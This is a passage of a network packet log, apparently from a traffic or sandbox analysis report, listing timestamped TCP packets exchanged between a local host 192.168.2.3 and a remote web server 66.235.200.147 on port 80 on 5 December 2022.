Dec 5, 2022 01:32:37.896720886 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896744013 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896749973 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.896749973 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.896764994 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896778107 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.896786928 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896809101 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896810055 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.896810055 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.896831989 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896840096 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.896853924 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896867990 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.896876097 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896898031 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896898031 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.896898985 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.896919012 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896944046 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.896960020 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896966934 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.896982908 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.896994114 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897005081 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897027969 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897027969 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897027969 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897048950 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897057056 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897070885 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897085905 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897094011 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897115946 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897125006 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897125006 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897138119 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897154093 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897161961 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897183895 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897186041 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897186041 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897206068 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897214890 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897229910 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897252083 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897253990 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897252083 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897277117 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897280931 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897300005 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897305012 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897321939 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897332907 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897349119 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897355080 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897372007 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897377968 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897393942 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897414923 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897416115 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897414923 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897439957 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897449017 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897463083 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897469997 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897485018 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897495031 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897507906 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897517920 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897531033 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897562027 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897563934 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897587061 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897597075 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897608995 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897628069 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897628069 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897631884 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897654057 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897665024 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897665977 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897676945 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897696972 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897699118 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897696972 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897722006 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897743940 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897758007 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897766113 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897784948 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897788048 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897808075 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897809982 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897833109 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897840977 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897840977 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897855043 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897866964 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897878885 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897902012 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897907019 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897907019 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897923946 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897937059 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897948027 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897969961 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.897964954 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897964954 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.897991896 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898000956 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898015022 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898025036 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898037910 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898058891 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898077011 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898082018 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898103952 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898103952 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898125887 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898133993 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898133993 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898149014 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898163080 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898171902 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898185015 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898195028 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898209095 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898216963 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898233891 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898240089 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898262978 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898266077 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898266077 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898286104 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898294926 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898309946 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898318052 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898332119 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898354053 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898360968 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898360968 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898377895 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898390055 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898401022 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898422956 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898422956 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898422956 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898446083 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898452997 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898468018 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898479939 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898490906 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898513079 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898514032 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898513079 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898538113 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898540974 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898560047 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898572922 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898586035 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898605108 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898605108 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898607969 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898629904 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898631096 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898650885 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898653984 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898673058 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898679018 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898694992 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898705959 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898718119 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898731947 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898742914 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898765087 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898763895 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898763895 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898787975 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898793936 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898812056 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898821115 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898833990 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898844957 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898858070 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898890972 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898899078 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898899078 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898899078 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898925066 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898947954 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898962975 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898971081 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898993969 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.898999929 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.898999929 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899019957 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899034023 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899041891 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899065018 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899066925 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899066925 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899089098 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899095058 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899111986 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899133921 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899147987 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899156094 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899174929 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899178028 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899198055 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899200916 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899223089 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899224043 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899246931 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899255991 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899255991 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899270058 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899291039 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899291039 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899291039 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899312973 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899317026 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899333954 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899343014 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899357080 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899370909 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899379969 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899403095 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899401903 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899401903 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899426937 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899432898 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899449110 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899456978 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899472952 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899485111 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899496078 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899518013 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899518013 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899518967 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899539948 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899545908 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899563074 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899571896 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899586916 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899599075 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899610043 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899636030 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899641037 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899641037 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899658918 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899667025 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899679899 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899682045 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899702072 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899703026 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899723053 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899724007 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899739027 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899746895 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899763107 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899770021 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899789095 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899791956 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899811029 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899815083 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899830103 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899837971 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899857998 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899859905 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899878025 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899880886 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899899006 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899904013 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899921894 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899928093 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899944067 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899950981 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899966002 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899972916 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.899991035 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.899996996 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900011063 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.900019884 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900033951 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.900041103 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900057077 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.900063992 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900079966 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.900087118 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900101900 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.900109053 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900126934 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.900132895 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900145054 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.900156975 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900171995 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.900178909 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900197029 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.900202990 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900224924 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900226116 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.900245905 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900252104 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.900252104 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.900266886 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.900269985 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900288105 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.900293112 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900315046 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900332928 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.900335073 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900357962 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900362015 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.900381088 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900388002 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.900403023 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900409937 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.900422096 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.900424957 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900438070 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.900449038 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900470972 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900490999 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.900494099 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900516033 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900517941 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.900537014 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900542974 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.900559902 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900564909 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.900577068 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.900582075 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900599003 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.900604010 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900620937 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.900625944 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900643110 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.900649071 CET	80	49705	66.235.200.147	192.168.2.3
